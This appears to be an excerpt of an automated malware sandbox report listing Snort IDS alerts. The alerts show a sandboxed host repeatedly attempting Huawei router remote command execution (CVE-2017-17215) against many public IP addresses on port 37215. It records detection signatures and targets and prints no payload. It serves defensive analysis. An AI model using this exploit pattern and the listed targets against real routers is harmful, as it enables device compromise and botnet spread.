          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52942 -> 41.227.61.120:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52942 -> 41.227.61.120:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42328 -> 41.12.73.20:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42328 -> 41.12.73.20:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50632 -> 41.171.176.87:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50632 -> 41.171.176.87:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42972 -> 41.243.72.36:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42972 -> 41.243.72.36:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40166 -> 41.39.192.96:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40166 -> 41.39.192.96:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36982 -> 41.124.208.139:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36982 -> 41.124.208.139:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37084 -> 41.15.115.215:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37084 -> 41.15.115.215:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59614 -> 41.214.56.194:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59614 -> 41.214.56.194:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55512 -> 41.171.226.212:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55512 -> 41.171.226.212:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37034 -> 41.17.4.10:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37034 -> 41.17.4.10:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34662 -> 41.42.182.57:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34662 -> 41.42.182.57:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34898 -> 41.34.211.250:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34898 -> 41.34.211.250:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35622 -> 41.98.62.55:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35622 -> 41.98.62.55:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35722 -> 197.90.226.50:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35722 -> 197.90.226.50:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46618 -> 197.7.43.192:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46618 -> 197.7.43.192:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60992 -> 197.80.73.144:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60992 -> 197.80.73.144:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33572 -> 197.213.78.125:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33572 -> 197.213.78.125:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53778 -> 197.233.84.68:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53778 -> 197.233.84.68:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49130 -> 197.104.17.64:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49130 -> 197.104.17.64:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33508 -> 197.71.16.48:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33508 -> 197.71.16.48:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47074 -> 197.242.213.101:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47074 -> 197.242.213.101:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36330 -> 197.49.202.99:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36330 -> 197.49.202.99:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39064 -> 197.80.91.78:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39064 -> 197.80.91.78:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59914 -> 197.83.45.248:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59914 -> 197.83.45.248:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54470 -> 197.154.41.156:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54470 -> 197.154.41.156:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58098 -> 197.127.60.59:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58098 -> 197.127.60.59:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44324 -> 197.57.205.203:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44324 -> 197.57.205.203:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60466 -> 197.108.120.6:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60466 -> 197.108.120.6:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48462 -> 197.17.190.200:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48462 -> 197.17.190.200:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39214 -> 197.185.44.105:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39214 -> 197.185.44.105:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39896 -> 197.65.240.243:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39896 -> 197.65.240.243:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47634 -> 197.180.108.237:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47634 -> 197.180.108.237:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49092 -> 197.39.251.145:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49092 -> 197.39.251.145:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60946 -> 197.195.21.214:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60946 -> 197.195.21.214:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46996 -> 197.169.160.51:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46996 -> 197.169.160.51:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48134 -> 197.197.252.41:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48134 -> 197.197.252.41:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41964 -> 197.203.193.230:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41964 -> 197.203.193.230:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42166 -> 197.249.69.94:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42166 -> 197.249.69.94:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49630 -> 197.159.164.36:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49630 -> 197.159.164.36:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47164 -> 197.194.195.219:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47164 -> 197.194.195.219:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54714 -> 197.46.41.217:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54714 -> 197.46.41.217:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43356 -> 197.126.77.114:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43356 -> 197.126.77.114:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38136 -> 197.22.86.226:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38136 -> 197.22.86.226:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53580 -> 197.103.125.136:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53580 -> 197.103.125.136:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34094 -> 197.164.85.199:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34094 -> 197.164.85.199:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38512 -> 197.72.123.125:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38512 -> 197.72.123.125:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40940 -> 197.252.229.69:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40940 -> 197.252.229.69:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47416 -> 197.19.54.49:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47416 -> 197.19.54.49:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41540 -> 197.28.228.209:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41540 -> 197.28.228.209:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57162 -> 197.11.77.125:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57162 -> 197.11.77.125:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43146 -> 197.117.126.15:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43146 -> 197.117.126.15:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34884 -> 197.35.145.63:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34884 -> 197.35.145.63:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44080 -> 197.125.212.165:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44080 -> 197.125.212.165:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37560 -> 197.210.171.190:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37560 -> 197.210.171.190:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37060 -> 197.173.72.203:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37060 -> 197.173.72.203:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44032 -> 197.202.185.225:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44032 -> 197.202.185.225:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37100 -> 197.6.103.241:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37100 -> 197.6.103.241:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54590 -> 197.234.107.63:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54590 -> 197.234.107.63:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51352 -> 197.186.253.219:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51352 -> 197.186.253.219:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38032 -> 197.249.38.199:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38032 -> 197.249.38.199:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60738 -> 197.134.84.218:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60738 -> 197.134.84.218:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48270 -> 197.116.121.161:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48270 -> 197.116.121.161:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39576 -> 197.166.63.28:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39576 -> 197.166.63.28:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38768 -> 197.217.7.170:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38768 -> 197.217.7.170:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35684 -> 197.26.89.111:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35684 -> 197.26.89.111:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58858 -> 197.87.23.231:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58858 -> 197.87.23.231:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38624 -> 197.130.172.5:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38624 -> 197.130.172.5:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59290 -> 197.51.193.136:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59290 -> 197.51.193.136:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42256 -> 197.86.240.138:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42256 -> 197.86.240.138:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39242 -> 197.126.238.59:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39242 -> 197.126.238.59:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42656 -> 197.39.65.59:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42656 -> 197.39.65.59:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41554 -> 197.245.183.158:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41554 -> 197.245.183.158:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60266 -> 197.152.22.175:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60266 -> 197.152.22.175:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50626 -> 197.59.102.140:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50626 -> 197.59.102.140:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52618 -> 197.2.169.181:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52618 -> 197.2.169.181:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54768 -> 197.148.215.112:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54768 -> 197.148.215.112:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50094 -> 197.30.84.53:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50094 -> 197.30.84.53:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45036 -> 197.70.188.162:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45036 -> 197.70.188.162:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41352 -> 197.40.54.237:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41352 -> 197.40.54.237:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58920 -> 197.169.127.49:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58920 -> 197.169.127.49:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35164 -> 197.224.220.203:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35164 -> 197.224.220.203:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57268 -> 197.84.209.200:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57268 -> 197.84.209.200:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43266 -> 197.186.72.206:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43266 -> 197.186.72.206:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48044 -> 197.157.236.231:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48044 -> 197.157.236.231:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57362 -> 197.39.147.188:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57362 -> 197.39.147.188:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55310 -> 197.194.244.124:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55310 -> 197.194.244.124:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48960 -> 197.41.202.13:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48960 -> 197.41.202.13:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:32776 -> 197.149.60.38:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:32776 -> 197.149.60.38:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55052 -> 197.189.64.144:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55052 -> 197.189.64.144:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60740 -> 197.2.50.56:37215
